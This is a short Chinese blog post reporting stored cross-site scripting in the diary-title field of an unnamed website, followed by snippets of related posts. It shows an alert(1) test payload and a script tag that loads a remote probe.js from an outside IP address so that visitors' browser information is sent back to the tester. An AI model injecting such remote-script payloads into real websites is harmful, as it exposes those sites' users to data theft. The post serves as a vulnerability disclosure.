美文网首页
某网站写日记的标题处存在XSS

某网站写日记的标题处存在XSS

作者: 就是爱文艺 | 来源:发表于2016-07-19 08:46 被阅读22次

某网站写日记的标题处存在XSS

在标题处插入XSS代码:<script>alert(1)</script>

1.png

点击预览,即可看到弹窗:

2.png

在标题处引入远程js文件:<script src="http://123.206.93.11/probe.js"></script>
由于标题字数限制,script标签不能完整闭合,但并不影响获取信息:

3.png

点击预览,在接收端可以看到返回信息:

4.png

相关文章

  • 某网站写日记的标题处存在XSS

    某网站写日记的标题处存在XSS 在标题处插入XSS代码: alert(1) 点击预览,即可看到弹窗: 在标题处引入...

  • 同一输入点的累计输入,构造完整XSS语句

    某站 添加“我关注的话题”处,存在XSS 在个人主页处点击添加话题,写入XSS测试 : alert(1) 点击确...

  • 【渗透实例】记录一次XSS渗透过程

    0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的...

  • web安全

    XSS攻击 XSS攻击,跨站脚本攻击,这是在网站中最容易产生的攻击。原理是攻击者向存在XSS漏洞的网站输入一段攻击...

  • 跨站脚本(XSS) 与 跨站请求伪造(CSRF)

    cross-site-scripting (XSS) 动态网站才会存在, 静态站点则不存在这个问题 对 XSS 最...

  • XSS

    XSS: 被攻击网站存在XSS漏洞,攻击者通过构造URL(DOM Based XSS)或者将攻击脚本存储在被攻击网...

  • 利用XSS结合CVE-2017-11283击穿ColdFusio

    在对某网站进行测试的时候,发现有个搜索框。在排除存在SQL注入后进行XSS测试,这里拿比较常见的payload: ...

  • 只能够弹窗的xss

    由于存在XSS的地方有字数限制,不能引入远程JS文件,因此只能实现弹窗。 某周刊网 注册会员时存在XSS 在姓名出...

  • 安全

    XSS攻击原理 1.XSS反射性攻击恶意代码并没有保存在目标网站中,通过引诱用户点击一个链接到目标网站的恶意链接来...

  • 开启了httponly的网站。XSS也就是测试下

    某站发帖与回帖模块存在XSS,但由于它开启了httponly,XSS也就是测试下. 此例为回帖:由于前端经过了HT...

网友评论

      本文标题:某网站写日记的标题处存在XSS

      本文链接:https://www.haomeiwen.com/subject/lkjmjttx.html